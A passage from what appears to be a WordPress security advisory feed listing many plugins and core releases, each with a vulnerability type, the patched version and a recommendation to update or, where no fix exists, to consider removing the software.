Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: eID Easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Booking.com Product Helper

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery via bulk_actions
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Time-Based Blind SQL Injection
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: N5 Upload Form

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Brafton

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: OSM – OpenStreetMap

Vulnerability: OpenStreetMap <= 6.0
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: External Links – nofollow, noopener & new window

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.56
Recommended Action: Update to version 2.56, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: 1.1.1
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WP Upload Restriction

Vulnerability: No subtitle
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Share-one-Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.3
Recommended Action: Update to version 1.15.3, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Lead Generated

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.25
Recommended Action: Update to version 1.25, or a newer patched version

Plugin: Better RSS Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_deactivate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: The School Management – Education & Learning Management

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Express Shop

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘layouts’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Divi Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Appointment Booking and Scheduling Calendar Plugin – Webba Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated (Contributor+) Settings Update
Patched Version: 1.57.0.10
Recommended Action: Update to version 1.57.0.10, or a newer patched version

Plugin: Icons Font Loader – Load Various Web Fonts & Icons on WP

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Prototype Pollution
Patched Version: 1.10.19
Recommended Action: Update to version 1.10.19, or a newer patched version

Plugin: Product Carousel Slider & Grid Ultimate for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Make Connector

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Laposta Signup Embed

Vulnerability: Missing Authorization
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Contact Form Builder by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.10.1
Recommended Action: Update to version 4.10.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Missing Authorization
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Interactive Image Map Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Stored Cross-Site Scripting via File Thumbnail
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: Coru LFMember

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: SQL Injection to PHP Object Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: NOO Timetable

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slide Anything – Responsive Content / HTML Slider and Carousel

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Mega Main Menu

Vulnerability: Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSVPMaker

Vulnerability: Authenticated (Admin+) SQL Injection via ‘delete’ parameter
Patched Version: 9.9.4
Recommended Action: Update to version 9.9.4, or a newer patched version

Plugin: Contact Form Check Tester

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress Export Import – WordPress extension for LearnPress

Vulnerability: Export/Import Courses <= 4.0.2
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: EnvíaloSimple: Email Marketing y Newsletters

Vulnerability: No subtitle
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WP Offload SES Lite

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Download Monitor

Vulnerability: Cross-Site Scripting via p Parameter
Patched Version: 3.3.6.2
Recommended Action: Update to version 3.3.6.2, or a newer patched version

Plugin: wptf-image-gallery

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.13
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.13, 3.8.13, 3.9.11, 4.0.10, 4.1.10, 4.2.7, 4.3.3, 4.4.2

Plugin: Ptengine – Heatmap Analytics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WordPress Photo Gallery – Image Gallery

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPE Indoshipping

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.5.0
Recommended Action: Update to version 6.5.0, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: WP CSV to Database – Insert CSV file content into WordPress database

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Gallery Plugin

Vulnerability: Unauthenticated Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related YouTube Videos

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: API Bearer Auth

Vulnerability: Cross-Site Scripting
Patched Version: 20190907
Recommended Action: Update to version 20190907, or a newer patched version

Plugin: Very Simple Breadcrumb

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Vendors

Vulnerability: Authenticated (Shop manager+) SQL Injection
Patched Version: 2.1.79
Recommended Action: Update to version 2.1.79, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Missing Authorization
Patched Version: 1.0.42.2
Recommended Action: Update to version 1.0.42.2, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Directory Listing
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Theme My Login 2fa

Vulnerability: 2FA Bypass via Brute Force
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Add Posts to Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_profiles_data
Patched Version: 1.4.1.5
Recommended Action: Update to version 1.4.1.5, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.2.8
Recommended Action: Update to version 8.2.8, or a newer patched version

Plugin: intouch

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Contact Form, Drag and Drop Form Builder Plugin – Live Forms

Vulnerability: SQL Injection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Podcasting Plugin by TSG

Vulnerability: Remote File Inclusion
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Administrator Open Redirect
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: Simple Photo Gallery

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.35
Recommended Action: Update to version 2.0.35, or a newer patched version

Plugin: My Site Audit

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.25
Recommended Action: Update to version 1.2.25, or a newer patched version

Plugin: Email Artillery (MASS EMAIL)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.28.0
Recommended Action: Update to version 1.28.0, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Insufficient Authorization
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Missing Authorization Checks
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated SQL Injection
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 3.0.102
Recommended Action: Update to version 3.0.102, or a newer patched version

Plugin: Enhanced Plugin Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: wp-tmkm-amazon

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Autocomplete Location field Contact Form 7

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Private Message

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘addRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Zotpress

Vulnerability: Reflected Cross-Site Scripting via ‘PHP_SELF’
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Missing Authorization
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.11.1
Recommended Action: Update to version 4.5.11.1, or a newer patched version

Plugin: All Video Gallery Plugin for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GD Star Rating

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: vSlider Multi Image Slider for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Information Exposure
Patched Version: 5.12.8
Recommended Action: Update to version 5.12.8, or a newer patched version

Plugin: Participants Database

Vulnerability: SQL Injection
Patched Version: 1.5.4.9
Recommended Action: Update to version 1.5.4.9, or a newer patched version

Plugin: Happy Addons for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Add to home screen WP Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting via ‘data’
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: RD Station

Vulnerability: Cross-Site Request Forgery to Plugin Log Deletion
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization Checks on create_post
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: SQL Injection
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Authenticated Arbitrary Plugin Deactivation and Settings Modification
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Product Category Tree

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EventON

Vulnerability: Insecure Direct Object Reference to Unauthorized Post Access
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Category Update
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Page Restrict

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: 404 Solution

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.34.0
Recommended Action: Update to version 2.34.0, or a newer patched version

Plugin: Add to Feedly

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: WPCargo Track & Trace

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 6.9.0
Recommended Action: Update to version 6.9.0, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.6
Recommended Action: Update to version 2.11.6, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Missing Authorization to Soundcloud User Add
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Tabs

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Sensitive Information Disclosure
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Core: WordPress

Vulnerability: Weak Multi-Site Activation Key for User and Site Signup
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Floating Action Button

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Extra Charges To Payment Gateway For WooCommerce (Standard)

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Userlike – WordPress Live Chat plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: SportsPress – Sports Club & League Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.15.23
Recommended Action: Update to version 4.15.23, or a newer patched version

Plugin: Cross Slide

Vulnerability: Multiple Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Contact form 7 DB

Vulnerability: SQL Injection
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: User Access Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Cross-Site Request Forgery to Order Cancellation
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Missing Authorization on tptn_ajax_clearcache
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Social Login by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: HM Multiple Roles

Vulnerability: Privilege Escalation via Arbitrary Role Change
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Uploader

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Sharing Toolkit

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Quasar form free – Contact Form Builder for WordPress

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘id’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PayPal Pro Add-on for iThemes Exchange

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: PDF & Print Button Joliprint

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Google Maps v3 Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Login WP

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2.29
Recommended Action: Update to version 1.2.2.29, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Missing Authorization
Patched Version: 1.8.16
Recommended Action: Update to version 1.8.16, or a newer patched version

Plugin: Email Queue by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Zendrop – Global Dropshipping

Vulnerability: SQL Injection in setMetaData
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: WP Post Author – Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder

Vulnerability: Privilege Escalation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Limit Attempts by BestWebSoft – WordPress Anti-Bot and Security Plugin for Login and Forms

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Authenticated PHAR Deserialization
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Simple Popup Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Add User

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: CSV Injection
Patched Version: 1.2.6.5
Recommended Action: Update to version 1.2.6.5, or a newer patched version

Plugin: Core Tweaks WP Setup

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MailerLite – Signup forms (official)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: CSV Injection
Patched Version: 5.9.7.2
Recommended Action: Update to version 5.9.7.2, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Missing Authorization to Plugin Options Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.3.18
